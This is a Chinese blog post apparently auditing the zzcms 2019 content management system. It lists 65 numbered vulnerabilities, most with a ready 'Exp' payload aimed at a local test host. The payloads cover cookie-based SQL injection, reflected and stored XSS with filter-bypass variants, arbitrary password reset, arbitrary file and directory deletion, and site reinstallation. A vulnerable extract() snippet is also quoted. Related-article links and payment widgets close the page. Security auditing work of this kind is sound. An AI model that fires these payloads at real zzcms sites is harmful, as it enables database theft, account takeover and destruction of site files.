代码审计:zzcms 2019

已于 2024-09-06 20:18:57 修改
阅读量170 收藏 1
点赞数 1
文章标签: php 代码复审 网络安全
于 2024-08-01 16:28:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GKD2019/article/details/140851145
版权

代码审计:zzcms 2019

漏洞列表如下(共计65个漏洞,附Exp,按时间顺序):
未完待续…

1、install/index.php 8行处存在变量覆盖漏洞(影响install/step_6.php) Exp:http://127.0.0.3/install/index.php Post:admin=<script>alert(1)</script>&step=6
2、bluecms/admin/login.php 31行处存在Cookie用户名密码明文传输漏洞 e.g. Cookie:PHPSESSID=k1lsech0g94r1mg7uh4rf5ado6; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;
3、uploadimg_form.php 64行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?noshuiyin="/><script>alert(1);</script>
4、uploadimg_form.php 65行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?imgid="/><script>alert(1);</script>
5、uploadimg_form.php 75行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php Post:flvurl=');</script><?php phpinfo(); ?><script>alert('1
7、ask/caina.php 21行处存在反射型XSS漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:127.0.0.3";alert(1);parent.location="
8、ask/search.php 48行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:askb=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
9、ask/search.php 56行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:asks=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
10、ask/search.php 167行处存在Sql注入漏洞(存疑) Exp:http://127.0.0.3/ask/search.php Cookie:page_size_ask=1%3BINSERT INTO zzcms_ask (id, bigclassid,bigclassname,smallclassid,smallclassname,title,content,img,jifen,editor,sendtime,hit,elite,typeid,passed) VALUES (2,1,1,2,3,user(),'ggg',1,0,'hhh','2024-07-31 00:33:55',1,1,1,1) %3B
11、inc/function.php 109行存在IP伪造漏洞
12、ask/show.php 114行处存在反射型XSS漏洞(存疑) Exp:http://127.0.0.3/ask/show.php Post:id=1 Cookie:UserName="/><script>alert(1);</script><input name="hh" value="1
13、baojia/baojiaadd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/baojia/baojiaadd.php Cookie:UserName=1' union select 1,2,3,4,5,6,7,user(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 limit 0,1#
14、baojia/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:b=' union select user(),1#
15、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword=' union select user() limit 1,1#
16、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province='  union select user() limit 1,1#
17、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city='  union select user() limit 1,1#
18、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng='  union select user() limit 1,1#
19、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword="/><script>alert(1)</script><meta name="keywords1" content="
20、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
21、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
22、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
23、company/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:b=' union select user(),1#
24、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companyb=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
25、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companys=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
26、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province='  union select user() limit 1,1#
27、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city='  union select user() limit 1,1#
28、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng='  union select user() limit 1,1#
29、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
30、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
31、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
32、baojia/searchform.php 74行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/searchform.php Cookie:companyb="/><script>alert(1)</script><meta name="keywords1" content="
33、inc/function.php 956行处存在用户伪造漏洞 Exp:Cookie:UserName=admin
34、dl/dl_download.php 36行处存在sql注入漏洞 Exp:http://127.0.0.3/dl/dl_download.php Cookie:UserName=' union select concat(999,user()) #
35、dl/dl_sendsms.php 77行处存在sql注入漏洞(理论上) Exp:http://127.0.0.3/dl/dl_sendsms.php Cookie:dlid=1' union select user()  #
36、dl/dladd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/dl/dladd.php Cookie:UserName=' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user(),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 #
37、dl/search.php 存在8个漏洞,与baojia/search.php的漏洞类似,不再重复
38、job中出现的漏洞与baojia里类似,不再重复
39、pp中出现的漏洞与baojia里类似,不再重复
40、special中出现的漏洞与baojia里类似,不再重复
41、zs中出现的漏洞与baojia里类似,不再重复
42、zh中出现的漏洞与baojia里类似,不再重复
43、wangkan中出现的漏洞与baojia里类似,不再重复
44、one/getpassword.php 第73行存在更改任意用户密码漏洞 Exp:http://127.0.0.3/one/getpassword.php Post:action=step3&username=admin&passwordtrue=admin888
45、zs/dl_liuyan_save.php 第52行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
46、zs/dl_liuyan_save.php 第52行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
47、zs/dl_liuyan_save.php 第53行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
48、zs/dl_liuyan_save.php 第53行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
49、ask/caina.php 21行处存在CSRF漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:baidu.com";alert(1);parent.location="
50、zs/dl_liuyan_save.php 第111行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
51、zs/dl_liuyan_save.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
52、zt/top.php 第21行存在sql注入漏洞(理论上),同样影响zt/adv.php Exp:http://'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user()#.1.com/zt/top.php
53、reg/sendmailagain.php 第40行存在查看临时用户密码漏洞 Exp:http://127.0.0.3/reg/sendmailagain.php Post:username=admin&newemail=1@qq.com
54、user/adv.php 第52行存在任意图片文件删除漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=modify&img=http://127.0.0.3/1.php;jpg&oldimg=test/../uploadfiles/../image/h.gif
55、user/adv2.php 第67行存在sql注入漏洞 Exp:http://127.0.0.3/user/adv2.php Post:action=modify&id=0 union select 1,2,3,4,5,6,7,8,9,user(),1,2,3,4 #
56、user/login.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/login.php Cookie:UserName=</span></div><script>alert(1)</script><div><span>
57、user/adv.php 第120行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=add&advlink=' οnclick=alert(1) '&adv=123
58、admin/ad_user_manage.php 第52行存在二次注入漏洞 Exp1:http://127.0.0.3/admin/ad_user_manage.php?action=pass Post:id=1  Exp2:http://127.0.0.3/user/adv.php Post:action=add&advlink=hhh&adv=123&img=',title=user() #
59、zh/show.php 第29行存在储存型XSS漏洞(由stripfxg函数导致) Exp:http://127.0.0.3/zh/show.php?id=1
60、admin/dl_data.php 第19行存在任意文件删除漏洞 Exp:http://127.0.0.3/admin/dl_data.php?action=del&filename=../1.php
61/user/ask.php 第20行存在存储型XSS漏洞(由markit()导致,在后台查看不良操作记录时触发) Exp:http://127.0.0.3/user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt>
62、install/index.php 第21行存在网站重装漏洞 http://127.0.0.3/install/index.php Post:step=2
63、admin/deluser.php 第19行存在任意文件删除漏洞
64、admin/del.php 第19行存在任意目录删除漏洞
65、admin/uploadfile_nouse.php 第19行存在任意文件删除漏洞

请添加图片描述
请添加图片描述

在这里插入图片描述
在这里插入图片描述

//当存在Get、Post的时候才执行这个语句,导致Cookie逃逸 或者利用变量覆盖
if($_REQUEST){
	$_POST =zc_check($_POST);
	$_GET =zc_check($_GET);
	$_COOKIE =zc_check($_COOKIE);
	@extract($_POST);
	@extract($_GET);
}



//在user/del.php 中,若能控制数据库中任意一个表的img参数,则可实现任意文件删除

// "/><?php phpinfo();?><meta name="keywords1" content="

//htmlspecialchars() 默认只编码双引号,虽然不能用双引号和<> 但是可以用 ‘,所以我
们的单引号很可能可以用。
//<scri<!--test-->pt>alert(111)</sc<!--test-->ript>
//<SCrIpt>alert(1)</SCrIpt>
GKDf1sh
关注
zzcms2019重装漏洞审计
Cvjark的博客
03-28 756
审计cms的重装业务逻辑并实现bypass达到系统重装的目的 漏洞点zzcms.com/install/index.php 附加调试器,访问:http://www.zzcms.com/install/index.php?XDEBUG_SESSION_START=16156(XDEBUG_SESSION_START是调试器附加的)访问结果如下图: 根据页面回显信息,keyword是:/install/install.lock文件,回到index.php代码,索引这个字段,发现0 found 试试全局f
zzcms2019.zip
08-22
zzcms2019.zip】是一个压缩包文件,包含了用于代码审计、网站搭建以及PHP代码学习的相关资源。从标题和描述中我们可以提取出几个关键的知识点,它们是PHP编程语言的学习、网站构建以及代码安全审计。 首先,PHP...
ZZCMS201910代码审计
ztK63LrD的博客
09-11 3374
现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE["askbigclassid"]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击。
PHP代码审计ZZCMS2019之cookie注入
杨同学的博客
11-23 867
PHP代码审计
%3c php if() %3e,代码审计ZZCMS2019版 XSS
weixin_32027491的博客
04-13 400
ZZCMS2019版本代码审计记录下载重装漏洞step1.php中会检测是否存在install.lock,存在则显示已经安装过,否则跳出判断,执行正常安装但是该判断只在step1.php中存在,step2.php,step3.php,step4.php均不存在该代码step2.phpstep3.php中设置了token,计算方式是:使用rand()生成一个随机数,然后以这个随机数作为前缀生成23位...
ZZCMS漏洞复现和代码审计
qq_48511129的博客
01-25 7121
ZZCMS漏洞复现和代码审计
(代码审计)zzcms存储型XSS
Cobra的博客
04-23 364
代码审计
zzcms8.1 代码审计
WEB渗透测试 从入门到萌新
04-20 411
下载 https://pan.baidu.com/s/1GuiXDTMl8HbOQ1yT_ek_vg 提取码:jox4 安装搭建教程PHP代码审计-从安装到开始_1_佛性死磕的博客-CSDN博客 1、Apache\conf下的vhosts.conf,删除下面这句,和下面的options开头的。 2、再设置打开phpStudy->其他选项菜单->phpStudy设置->允许目录列表打上勾。再设置E:\phpStudy\Apache\conf下的httpd.conf,去掉# Load.
新手入门代码审计 zzcms实战
老油条的博客
12-06 1229
新手如何进行代码审计-zzcms实战教学 目标:zzcms 基础:php代码基础 web漏洞基础 工具:web环境 seay审计工具 本次的目标是zzcms 8.1 首先我们下载源码:链接:https://pan.baidu.com/s/1GuiXDTMl8HbOQ1yT_ek_vg 提取码:jox4 由于相关规定 以及涉及的风险 这里使用的是比较老的代码 仅供学习使用 拿到了代码 我们现在需要进行安装 很简单里面有安装说明 关于审计思路 这里列举常用的三种 1.全文通读 从头开始读代码 缺点:速度
代码审计-zzcms2021前台写shell-复现与理解
giaogiao123的博客
11-06 704
实验环境 phpstorm 2018 +xdebug (动态调试) burp(hackbar不大行) phpstudy(5.5.38) 我们来看一下漏洞的主要地方 payload POST /zzcms2021/zzcms2021/3/ucenter_api/api/uc.php?code=e33cwZ1KOYMpjjKGhPu7avvOo6fuX2GfQ3bUoYN55lxTZFUVgLk6vtNqDKWVW7OLP/qq1DWgCdCxRhNmzfM HTTP/1.1 Host: 127.0.0.1
zzcms83代码审计练习
10-24
提供刚刚学习代码审计的同学一起学习,其实也没有什么好说的,由于市面上比较难找,这里提供给大家方便下载,版本是8.3的。
zzcms2020代码审计1
08-03
zzcms2020代码审计1】涉及的是一个针对zzcms内容管理系统在2020年进行的安全审计过程,该审计主要揭示了一个SQL注入漏洞。审计报告来源于奇安信攻防社区,其中包含了对问题的详细分析和复现步骤。 审计首先指出,...
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1561
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
使用API接口创建短链接【PHP版】
weixin_43833373的博客
10-10 303
C1N短网址(c1n.cn)还提供了丰富的短链接管理的API接口,只需进行简单的接口调用,就能将稳定好用的短链接系统接入到自己的产品中,极大地降低了开发成本。上述代码中使用到的token需要前往C1N短网址(c1n.cn)-控制台-我的信息进行查询。
PHP智慧餐饮新风尚点餐系统
2401_84593614的博客
10-10 322
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
RCE+[伪协议综合]
2302_81328699的博客
10-03 541
伪协议综合
0.0.0.0 127.0.0.1等几个特殊的IP地址
最新发布
zhurobert的博客
10-10 197
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值